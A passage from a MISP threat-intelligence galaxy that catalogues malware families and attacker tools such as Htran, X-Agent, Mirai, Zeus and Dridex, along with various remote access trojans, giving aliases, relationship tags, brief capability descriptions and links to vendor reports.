https://cofense.com/major-us-financial-institutions-imitated-advanced-geodo-emotet-phishing-lures-appear-authentic-containing-proofpoint-url-wrapped-links/

Hoardy

The tag is: misp-galaxy:tool="Hoardy"

Hoardy is also known as:

  • Hoarde

  • Phindolp

  • BS2005

Hoardy has relationships with:

  • similar: misp-galaxy:mitre-malware="BS2005 - S0014" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="BS2005" with estimative-language:likelihood-probability="likely"

Table 16348. Table References

Links

https://github.com/nccgroup/Royal_APT

Htran

HUC Packet Transmitter (HTran) is a proxy tool, used to intercept and redirect Transmission Control Protocol (TCP) connections from the local host to a remote host. This makes it possible to obfuscate an attacker’s communications with victim networks. The tool has been freely available on the internet since at least 2009. HTran facilitates TCP connections between the victim and a hop point controlled by an attacker. Malicious cyber actors can use this technique to redirect their packets through multiple compromised hosts running HTran, to gain greater access to hosts in a network.

The tag is: misp-galaxy:tool="Htran"

Htran is also known as:

  • HUC Packet Transmitter

  • HTran

Htran has relationships with:

  • similar: misp-galaxy:malpedia="HTran" with estimative-language:likelihood-probability="almost-certain"

Table 16349. Table References

Links

http://www.secureworks.com/research/threats/htran/

https://www.ncsc.gov.uk/content/files/protected_files/article_files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf

HTTPBrowser

The tag is: misp-galaxy:tool="HTTPBrowser"

HTTPBrowser is also known as:

  • TokenControl

HTTPBrowser has relationships with:

  • similar: misp-galaxy:mitre-malware="HTTPBrowser - S0070" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="HttpBrowser" with estimative-language:likelihood-probability="almost-certain"

Table 16350. Table References

Links

https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop

Disgufa

The tag is: misp-galaxy:tool="Disgufa"

Elirks

The tag is: misp-galaxy:tool="Elirks"

Elirks has relationships with:

  • similar: misp-galaxy:malpedia="Elirks" with estimative-language:likelihood-probability="likely"

Snifula

The tag is: misp-galaxy:tool="Snifula"

Snifula is also known as:

  • Ursnif

Snifula has relationships with:

  • similar: misp-galaxy:banker="Gozi" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Gozi" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Snifula" with estimative-language:likelihood-probability="likely"

Table 16351. Table References

Links

https://www.circl.lu/pub/tr-13/

Aumlib

The tag is: misp-galaxy:tool="Aumlib"

Aumlib is also known as:

  • Yayih

  • mswab

  • Graftor

Aumlib has relationships with:

  • similar: misp-galaxy:malpedia="Graftor" with estimative-language:likelihood-probability="likely"

Table 16352. Table References

Links

http://www.cybersquared.com/killing-with-a-borrowed-knife-chaining-core-cloud-service-profile-infrastructure-for-cyber-attacks

CTRat

The tag is: misp-galaxy:tool="CTRat"

Table 16353. Table References

Links

http://www.fireeye.com/blog/technical/threat-intelligence/2014/07/spy-of-the-tiger.html

Emdivi

The tag is: misp-galaxy:tool="Emdivi"

Emdivi is also known as:

  • Newsripper

Emdivi has relationships with:

  • similar: misp-galaxy:malpedia="Emdivi" with estimative-language:likelihood-probability="likely"

Table 16354. Table References

Links

http://www.symantec.com/connect/blogs/operation-cloudyomega-ichitaro-zero-day-and-ongoing-cyberespionage-campaign-targeting-japan

Etumbot

The tag is: misp-galaxy:tool="Etumbot"

Etumbot is also known as:

  • Exploz

  • Specfix

  • RIPTIDE

Etumbot has relationships with:

  • similar: misp-galaxy:mitre-malware="RIPTIDE - S0003" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="EtumBot" with estimative-language:likelihood-probability="almost-certain"

Table 16355. Table References

Links

www.arbornetworks.com/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf

Fexel

The tag is: misp-galaxy:tool="Fexel"

Fexel is also known as:

  • Loneagent

Fysbis

The tag is: misp-galaxy:tool="Fysbis"

Table 16356. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/

Hikit

The tag is: misp-galaxy:tool="Hikit"

Hikit has relationships with:

  • similar: misp-galaxy:mitre-malware="Hikit - S0009" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="HiKit" with estimative-language:likelihood-probability="almost-certain"

Table 16357. Table References

Links

https://blog.bit9.com/2013/02/25/bit9-security-incident-update/

Hancitor

The tag is: misp-galaxy:tool="Hancitor"

Hancitor is also known as:

  • Tordal

  • Chanitor

  • Pony

Hancitor has relationships with:

  • similar: misp-galaxy:malpedia="Hancitor" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Pony" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Fareit" with estimative-language:likelihood-probability="likely"

Table 16358. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear

Ruckguv

The tag is: misp-galaxy:tool="Ruckguv"

Ruckguv has relationships with:

  • similar: misp-galaxy:malpedia="Ruckguv" with estimative-language:likelihood-probability="likely"

Table 16359. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear

HDRoot

The tag is: misp-galaxy:tool="HDRoot"

HDRoot has relationships with:

  • similar: misp-galaxy:malpedia="HDRoot" with estimative-language:likelihood-probability="almost-certain"

Table 16362. Table References

Links

http://williamshowalter.com/a-universal-windows-bootkit/

IRONGATE

The tag is: misp-galaxy:tool="IRONGATE"

Table 16363. Table References

Links

https://www.fireeye.com/blog/threat-research/2016/06/irongate_ics_malware.html

ShimRAT

The tag is: misp-galaxy:tool="ShimRAT"

Table 16364. Table References

Links

https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf

X-Agent

APT28’s second-stage persistent macOS backdoor. This backdoor component is known to have a modular structure featuring various espionage functionalities, such as key-logging, screen grabbing and file exfiltration. This component is available for OS X, Windows, Linux and iOS operating systems.

Xagent is a modular backdoor with spying functionalities such as keystroke logging and file exfiltration. Xagent is the group’s flagship backdoor and heavily used in their operations. Early versions for Linux and Windows were seen years ago, then in 2015 an iOS version came out. One year later, an Android version was discovered and finally, in the beginning of 2017, an Xagent sample for OS X was described.

The tag is: misp-galaxy:tool="X-Agent"

X-Agent is also known as:

  • XAgent

X-Agent has relationships with:

  • similar: misp-galaxy:mitre-malware="CHOPSTICK - S0023" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="X-Agent for Android - S0314" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="CHOPSTICK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="X-Agent (Android)" with estimative-language:likelihood-probability="likely"

Table 16365. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-ios-espionage-app-found/

https://app.box.com/s/l7n781ig6n8wlf1aff5hgwbh4qoi5jqq

https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/

https://objective-see.com/blog/blog_0x25.html#XAgent

X-Tunnel

The tag is: misp-galaxy:tool="X-Tunnel"

X-Tunnel is also known as:

  • XTunnel

X-Tunnel has relationships with:

  • similar: misp-galaxy:mitre-malware="XTunnel - S0117" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="XTunnel" with estimative-language:likelihood-probability="likely"

Foozer

The tag is: misp-galaxy:tool="Foozer"

Table 16366. Table References

Links

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

WinIDS

The tag is: misp-galaxy:tool="WinIDS"

Table 16367. Table References

Links

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

DownRange

The tag is: misp-galaxy:tool="DownRange"

Table 16368. Table References

Links

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

Mad Max

The tag is: misp-galaxy:tool="Mad Max"

Mad Max has relationships with:

  • similar: misp-galaxy:botnet="Madmax" with estimative-language:likelihood-probability="likely"

Table 16369. Table References

Links

https://www.arbornetworks.com/blog/asert/mad-max-dga/

Crimson

Crimson is malware used as part of a campaign known as Operation Transparent Tribe that targeted Indian diplomatic and military victims.

The tag is: misp-galaxy:tool="Crimson"

Crimson has relationships with:

  • similar: misp-galaxy:rat="Crimson" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="Crimson - S0115" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Crimson RAT" with estimative-language:likelihood-probability="likely"

Table 16370. Table References

Links

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF

Prikormka

Operation Groundbait based on our research into the Prikormka malware family. This includes detailed technical analysis of the Prikormka malware family and its spreading mechanisms, and a description of the most noteworthy attack campaigns.

The tag is: misp-galaxy:tool="Prikormka"

Prikormka has relationships with:

  • similar: misp-galaxy:mitre-malware="Prikormka - S0113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Prikormka" with estimative-language:likelihood-probability="almost-certain"

Table 16371. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf

NanHaiShu

This whitepaper details a malicious program we identify as NanHaiShu. Based on our analysis, the threat actor behind this malware targets government and private-sector organizations.

The tag is: misp-galaxy:tool="NanHaiShu"

NanHaiShu has relationships with:

  • similar: misp-galaxy:mitre-malware="NanHaiShu - S0228" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="NanHaiShu" with estimative-language:likelihood-probability="almost-certain"

Table 16372. Table References

Links

https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf

Umbreon

Umbreon (sharing the same name as the Pokémon) targets Linux systems, including systems running both Intel and ARM processors, expanding the scope of this threat to include embedded devices as well.

The tag is: misp-galaxy:tool="Umbreon"

Umbreon has relationships with:

  • similar: misp-galaxy:mitre-malware="Umbreon - S0221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Umbreon" with estimative-language:likelihood-probability="likely"

Table 16373. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/

Odinaff

Odinaff is typically deployed in the first stage of an attack, to gain a foothold onto the network, providing a persistent presence and the ability to install additional tools onto the target network. These additional tools bear the hallmarks of a sophisticated attacker which has plagued the financial industry since at least 2013–Carbanak. This new wave of attacks has also used some infrastructure that has previously been used in Carbanak campaigns.

The tag is: misp-galaxy:tool="Odinaff"

Odinaff has relationships with:

  • similar: misp-galaxy:malpedia="Odinaff" with estimative-language:likelihood-probability="likely"

Table 16374. Table References

Links

https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks

Hworm

Unit 42 has observed a new version of Hworm (or Houdini) being used within multiple attacks. This blog outlines technical details of this new Hworm version and documents an attack campaign making use of the backdoor. Of the samples used in this attack, the first we observed were June 2016, while as-of publication we were still seeing attacks as recently as mid-October, suggesting that this is likely an active, ongoing campaign.

The tag is: misp-galaxy:tool="Hworm"

Hworm is also known as:

  • Houdini

Hworm has relationships with:

  • similar: misp-galaxy:malpedia="Houdini" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="H-worm" with estimative-language:likelihood-probability="likely"

Table 16375. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/

Backdoor.Dripion

Backdoor.Dripion was custom developed, deployed in a highly targeted fashion, and used command and control servers disguised as antivirus company websites.

The tag is: misp-galaxy:tool="Backdoor.Dripion"

Backdoor.Dripion is also known as:

  • Dripion

Table 16376. Table References

Links

http://www.symantec.com/connect/blogs/taiwan-targeted-new-cyberespionage-back-door-trojan

Adwind

Adwind is a backdoor written purely in Java that targets systems supporting the Java runtime environment. It accepts commands that can be used, among other things, to display messages on the system, open URLs, update the malware, download/execute files, and download/load plugins. A significant amount of additional functionality can be provided through downloadable plugins, including such things as remote control options and shell command execution.

The tag is: misp-galaxy:tool="Adwind"

Adwind is also known as:

  • AlienSpy

  • Frutas

  • Unrecom

  • Sockrat

  • JSocket

  • jRat

  • Backdoor:Java/Adwind

Adwind has relationships with:

  • similar: misp-galaxy:rat="Adwind RAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Adwind" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Sockrat" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="AdWind" with estimative-language:likelihood-probability="likely"

Table 16377. Table References

Links

https://securelist.com/blog/research/73660/adwind-faq/

Bedep

The tag is: misp-galaxy:tool="Bedep"

Bedep has relationships with:

  • similar: misp-galaxy:malpedia="Bedep" with estimative-language:likelihood-probability="likely"

Cromptui

The tag is: misp-galaxy:tool="Cromptui"

Dridex

Dridex is a strain of banking malware that leverages macros in Microsoft Office to infect systems. Once a computer has been infected, Dridex attackers can steal banking credentials and other personal information on the system to gain access to the financial records of a user.

The tag is: misp-galaxy:tool="Dridex"

Dridex is also known as:

  • Cridex

Dridex has relationships with:

  • similar: misp-galaxy:banker="Dridex" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Dridex" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:banker="Feodo" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Feodo" with estimative-language:likelihood-probability="likely"

Table 16378. Table References

Links

http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf

Fareit

The tag is: misp-galaxy:tool="Fareit"

Fareit has relationships with:

  • similar: misp-galaxy:malpedia="Pony" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Hancitor" with estimative-language:likelihood-probability="likely"

Gafgyt

The tag is: misp-galaxy:tool="Gafgyt"

Gafgyt has relationships with:

  • similar: misp-galaxy:malpedia="Bashlite" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:botnet="Gafgyt" with estimative-language:likelihood-probability="likely"

Gamarue

The tag is: misp-galaxy:tool="Gamarue"

Gamarue is also known as:

  • Andromeda

Gamarue has relationships with:

  • similar: misp-galaxy:malpedia="Andromeda" with estimative-language:likelihood-probability="likely"

Table 16379. Table References

Links

https://blog.gdatasoftware.com/2015/03/24274-the-andromeda-gamarue-botnet-is-on-the-rise-again

Necurs

The Necurs botnet is a distributor of many pieces of malware, most notably Locky.

The tag is: misp-galaxy:tool="Necurs"

Necurs has relationships with:

  • similar: misp-galaxy:malpedia="Necurs" with estimative-language:likelihood-probability="likely"

Table 16380. Table References

Links

https://en.wikipedia.org/wiki/Necurs_botnet

https://www.bleepingcomputer.com/news/security/worlds-largest-spam-botnet-finds-a-new-way-to-avoid-detection-for-now/

Palevo

The tag is: misp-galaxy:tool="Palevo"

Akbot

The tag is: misp-galaxy:tool="Akbot"

Akbot is also known as:

  • Qbot

  • Qakbot

  • PinkSlipBot

Akbot has relationships with:

  • similar: misp-galaxy:banker="Qakbot" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:botnet="Akbot" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="QakBot" with estimative-language:likelihood-probability="likely"

Table 16381. Table References

Links

https://en.wikipedia.org/wiki/Akbot

Upatre

Upatre is a Trojan downloader that is used to set up other threats on the victim’s PC. Upatre has been used recently in several high profile Trojan attacks involving the Gameover Trojan.

The tag is: misp-galaxy:tool="Upatre"

Upatre has relationships with:

  • similar: misp-galaxy:malpedia="Upatre" with estimative-language:likelihood-probability="likely"

Vawtrak

Vawtrak is an information stealing malware family that is primarily used to gain unauthorised access to bank accounts through online banking websites.

The tag is: misp-galaxy:tool="Vawtrak"

Vawtrak has relationships with:

  • similar: misp-galaxy:banker="Vawtrak" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Vawtrak" with estimative-language:likelihood-probability="likely"

Table 16382. Table References

Links

https://www.sophos.com/medialibrary/PDFs/technical%20papers/sophos-vawtrak-international-crimeware-as-a-service-tpna.pdf

Empire

Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

The tag is: misp-galaxy:tool="Empire"

Empire has relationships with:

  • similar: misp-galaxy:exploit-kit="Empire" with estimative-language:likelihood-probability="likely"

Table 16383. Table References

Links

https://github.com/adaptivethreat/Empire

Explosive

Beginning in late 2012, a carefully orchestrated attack campaign we call Volatile Cedar has been targeting individuals, companies and institutions worldwide. This campaign, led by a persistent attacker group, has successfully penetrated a large number of targets using various attack techniques, and specifically, a custom-made malware implant codenamed Explosive.

The tag is: misp-galaxy:tool="Explosive"

Table 16384. Table References

Links

https://www.checkpoint.com/downloads/volatile-cedar-technical-report.pdf

KeyBoy

The actors used a new version of “KeyBoy,” a custom backdoor first disclosed by researchers at Rapid7 in June 2013. Their work outlined the capabilities of the backdoor, and exposed the protocols and algorithms used to hide the network communication and configuration data.

The tag is: misp-galaxy:tool="KeyBoy"

KeyBoy has relationships with:

  • similar: misp-galaxy:malpedia="KeyBoy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Yahoyah" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Yahoyah" with estimative-language:likelihood-probability="likely"

Table 16385. Table References

Links

https://citizenlab.org/2016/11/parliament-keyboy/

https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india

Yahoyah

The attacks in this case are associated with a campaign called Tropic Trooper, which has been active since at least 2011 and is known for heavily targeting Taiwan. One of the attacks used their known Yahoyah malware…

The tag is: misp-galaxy:tool="Yahoyah"

Yahoyah is also known as:

  • W32/Seeav

Yahoyah has relationships with:

  • similar: misp-galaxy:malpedia="KeyBoy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Yahoyah" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="KeyBoy" with estimative-language:likelihood-probability="likely"

Table 16386. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/

Tartine

Delphi RAT used by Sofacy.

The tag is: misp-galaxy:tool="Tartine"

Mirai

Mirai (Japanese for "the future") is malware that turns computer systems running Linux into remotely controlled "bots", that can be used as part of a botnet in large-scale network attacks. It primarily targets online consumer devices such as remote cameras and home routers. The Mirai botnet has been used in some of the largest and most disruptive distributed denial of service (DDoS) attacks, including an attack on 20 September 2016 on computer security journalist Brian Krebs’s web site, an attack on French web host OVH and the October 2016 Dyn cyberattack.

The tag is: misp-galaxy:tool="Mirai"

Mirai is also known as:

  • Linux/Mirai

Mirai has relationships with:

  • similar: misp-galaxy:botnet="Mirai" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Mirai (ELF)" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Owari" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Sora" with estimative-language:likelihood-probability="likely"

Table 16387. Table References

Links

https://en.wikipedia.org/wiki/Mirai_(malware)

Masuta

IoT malware based on Mirai but slightly improved.

The tag is: misp-galaxy:tool="Masuta"

Masuta is also known as:

  • PureMasuta

Masuta has relationships with:

  • similar: misp-galaxy:malpedia="Masuta" with estimative-language:likelihood-probability="almost-certain"

Table 16388. Table References

Links

https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7

BASHLITE

The tag is: misp-galaxy:tool="BASHLITE"

BASHLITE has relationships with:

  • similar: misp-galaxy:malpedia="Bashlite" with estimative-language:likelihood-probability="almost-certain"

BlackEnergy

BlackEnergy is a trojan which has undergone significant functional changes since it was first publicly analysed by Arbor Networks in 2007. It has evolved from a relatively simple DDoS trojan into a relatively sophisticated piece of modern malware with a modular architecture, making it a suitable tool for sending spam and for online bank fraud, as well as for targeted attacks. BlackEnergy version 2, which featured rootkit techniques, was documented by SecureWorks in 2010. The targeted attacks recently discovered are proof that the trojan is still alive and kicking in 2014. We provide a technical analysis of the BlackEnergy family, focusing on novel functionality and the differences introduced by new lite variants. We describe the most notable aspects of the malware, including its techniques for bypassing UAC, defeating the signed driver requirement in Windows and a selection of BlackEnergy2 plug-ins used for parasitic file infections, network discovery and remote code execution and data collection.

The tag is: misp-galaxy:tool="BlackEnergy"

BlackEnergy has relationships with:

  • similar: misp-galaxy:mitre-malware="BlackEnergy - S0089" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="BlackEnergy" with estimative-language:likelihood-probability="likely"

Table 16389. Table References

Links

https://www.virusbulletin.com/conference/vb2014/abstracts/back-blackenergy-2014-targeted-attacks-ukraine-and-poland/

Trojan.Seaduke

Trojan.Seaduke is a Trojan horse that opens a back door on the compromised computer. It may also download potentially malicious files.

The tag is: misp-galaxy:tool="Trojan.Seaduke"

Trojan.Seaduke is also known as:

  • Seaduke

Table 16390. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-031915-4935-99

Backdoor.Tinybaron

The tag is: misp-galaxy:tool="Backdoor.Tinybaron"

Incognito RAT

The tag is: misp-galaxy:tool="Incognito RAT"

DownRage

The tag is: misp-galaxy:tool="DownRage"

DownRage is also known as:

  • Carberplike

Table 16391. Table References

Links

https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/

https://twitter.com/Timo_Steffens/status/814781584536719360

GeminiDuke

GeminiDuke is malware that was used by APT29 from 2009 to 2012.

The tag is: misp-galaxy:tool="GeminiDuke"

GeminiDuke has relationships with:

  • similar: misp-galaxy:mitre-malware="GeminiDuke - S0049" with estimative-language:likelihood-probability="likely"

Table 16392. Table References

Links

https://attack.mitre.org/wiki/Software/S0049

Zeus

Trojan.Zbot, also called Zeus, is a Trojan horse that attempts to steal confidential information from the compromised computer. It may also download configuration files and updates from the Internet. The Trojan is created using a Trojan-building toolkit.

The tag is: misp-galaxy:tool="Zeus"

Zeus is also known as:

  • Trojan.Zbot

  • Zbot

Zeus has relationships with:

  • similar: misp-galaxy:banker="Zeus" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:botnet="Zeus" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Zeus" with estimative-language:likelihood-probability="likely"

Table 16393. Table References

Links

https://en.wikipedia.org/wiki/Zeus_(malware)

https://www.symantec.com/security_response/writeup.jsp?docid=2010-011016-3514-99

Shifu

Shifu is a Banking Trojan first discovered in 2015. Shifu is based on the Shiz source code which incorporated techniques used by Zeus. Attackers use Shifu to steal credentials for online banking websites around the world, starting in Russia but later including the UK, Italy, and others.

The tag is: misp-galaxy:tool="Shifu"

Shifu has relationships with:

  • similar: misp-galaxy:malpedia="Shifu" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Shiz" with estimative-language:likelihood-probability="likely"

Table 16394. Table References

Links

http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/

Shiz

The new variant of the Shiz Trojan malware targets mission-critical enterprise resource planning (ERP) applications — particularly SAP users.

The tag is: misp-galaxy:tool="Shiz"

Shiz has relationships with:

  • similar: misp-galaxy:tool="Shifu" with estimative-language:likelihood-probability="likely"

Table 16395. Table References

Links

https://securityintelligence.com/tag/shiz-trojan-malware/

MM Core

Also known as “BaneChant”, MM Core is a file-less APT which is executed in memory by a downloader component. It was first reported in 2013 under the version number “2.0-LNK” where it used the tag “BaneChant” in its command-and-control (C2) network request. A second version “2.1-LNK” with the network tag “StrangeLove” was discovered shortly after.

The tag is: misp-galaxy:tool="MM Core"

MM Core is also known as:

  • MM Core backdoor

  • BigBoss

  • SillyGoose

  • BaneChant

  • StrangeLove

MM Core has relationships with:

  • similar: misp-galaxy:malpedia="MM Core" with estimative-language:likelihood-probability="likely"

Table 16396. Table References

Links

https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose

Shamoon

Shamoon, also known as Disttrack, is a modular computer virus discovered by Seculert in 2012, targeting recent NT kernel-based versions of Microsoft Windows. The virus has been used for cyber espionage in the energy sector. Its discovery was announced on 16 August 2012 by Symantec, Kaspersky Lab, and Seculert. Similarities have been highlighted by Kaspersky Lab and Seculert between Shamoon and the Flame malware.

The tag is: misp-galaxy:tool="Shamoon"

Shamoon is also known as:

  • DistTrack

Shamoon has relationships with:

  • similar: misp-galaxy:mitre-malware="Shamoon - S0140" with estimative-language:likelihood-probability="likely"

Table 16397. Table References

Links

https://en.wikipedia.org/wiki/Shamoon

https://securityaffairs.co/wordpress/78867/breaking-news/shamoon-virustotal.html

GhostAdmin

According to MalwareHunterTeam and other researchers that have looked at the malware’s source code, GhostAdmin seems to be a reworked version of CrimeScene, another botnet malware family that was active around 3-4 years ago.

The tag is: misp-galaxy:tool="GhostAdmin"

GhostAdmin has relationships with:

  • similar: misp-galaxy:malpedia="GhostAdmin" with estimative-language:likelihood-probability="likely"

Table 16398. Table References

Links

https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/

EyePyramid Malware

Two Italians referred to as the “Occhionero brothers” have been arrested and accused of using malware and a carefully-prepared spear-phishing scheme to spy on high-profile politicians and businessmen. This case has been called “EyePyramid”, which we first discussed last week. (Conspiracy theories aside, the name came from a domain name and directory path that was found during the research.)

The tag is: misp-galaxy:tool="EyePyramid Malware"

Table 16399. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-inner-workings-eyepyramid/

LuminosityLink

LuminosityLink is a malware family costing $40 that purports to be a system administration utility

The tag is: misp-galaxy:tool="LuminosityLink"

Table 16400. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/

Flokibot

Floki Bot, described recently by Dr. Peter Stephenson from SC Magazine, is yet another bot based on the leaked Zeus code. However, the author came up with various custom modifications that make it more interesting.

The tag is: misp-galaxy:tool="Flokibot"

Flokibot is also known as:

  • Floki Bot

  • Floki

Flokibot has relationships with:

  • similar: misp-galaxy:malpedia="FlokiBot" with estimative-language:likelihood-probability="almost-certain"

Table 16401. Table References

Links

https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/

https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/

ZeroT

Most recently, we have observed the same group targeting military and aerospace interests in Russia and Belarus. Since the summer of 2016, this group began using a new downloader known as ZeroT to install the PlugX remote access Trojan (RAT) and added Microsoft Compiled HTML Help (.chm) as one of the initial droppers delivered in spear-phishing emails.

The tag is: misp-galaxy:tool="ZeroT"

ZeroT has relationships with:

  • similar: misp-galaxy:mitre-malware="ZeroT - S0230" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="ZeroT" with estimative-language:likelihood-probability="likely"

Table 16402. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx

StreamEx

Cylance dubbed this family of malware StreamEx, based upon a common exported function used across all samples ‘stream’, combined with the dropper functionality to append ‘ex’ to the DLL file name. The StreamEx family has the ability to access and modify the user’s file system, modify the registry, create system services, enumerate process and system information, enumerate network resources and drive types, scan for security tools such as firewall products and antivirus products, change browser security settings, and remotely execute commands. The malware documented in this post was predominantly 64-bit, however, there are 32-bit versions of the malware in the wild.

The tag is: misp-galaxy:tool="StreamEx"

StreamEx has relationships with:

  • similar: misp-galaxy:mitre-malware="StreamEx - S0142" with estimative-language:likelihood-probability="likely"

Table 16403. Table References

Links

https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar

adzok

Remote Access Trojan

The tag is: misp-galaxy:tool="adzok"

adzok has relationships with:

  • similar: misp-galaxy:malpedia="Adzok" with estimative-language:likelihood-probability="almost-certain"

Table 16404. Table References

Links

https://github.com/kevthehermit/RATDecoders

albertino

Remote Access Trojan

The tag is: misp-galaxy:tool="albertino"

Table 16405. Table References

Links

https://github.com/kevthehermit/RATDecoders

arcom

Remote Access Trojan

The tag is: misp-galaxy:tool="arcom"

Table 16406. Table References

Links

https://github.com/kevthehermit/RATDecoders

blacknix

Remote Access Trojan

The tag is: misp-galaxy:tool="blacknix"

Table 16407. Table References

Links

https://github.com/kevthehermit/RATDecoders

bluebanana

Remote Access Trojan

The tag is: misp-galaxy:tool="bluebanana"

Table 16408. Table References

Links

https://github.com/kevthehermit/RATDecoders

bozok

Remote Access Trojan

The tag is: misp-galaxy:tool="bozok"

bozok has relationships with:

  • similar: misp-galaxy:malpedia="Bozok" with estimative-language:likelihood-probability="almost-certain"

Table 16409. Table References

Links

https://github.com/kevthehermit/RATDecoders

clientmesh

Remote Access Trojan

The tag is: misp-galaxy:tool="clientmesh"

Table 16410. Table References

Links

https://github.com/kevthehermit/RATDecoders

cybergate

Remote Access Trojan

The tag is: misp-galaxy:tool="cybergate"

cybergate has relationships with:

  • similar: misp-galaxy:malpedia="CyberGate" with estimative-language:likelihood-probability="almost-certain"

Table 16411. Table References

Links

https://github.com/kevthehermit/RATDecoders

darkcomet

Remote Access Trojan

The tag is: misp-galaxy:tool="darkcomet"

darkcomet has relationships with:

  • used-by: misp-galaxy:threat-actor="APT-C-27" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="DarkComet" with estimative-language:likelihood-probability="almost-certain"

Table 16412. Table References

Links

https://github.com/kevthehermit/RATDecoders

darkrat

Remote Access Trojan

The tag is: misp-galaxy:tool="darkrat"

darkrat has relationships with:

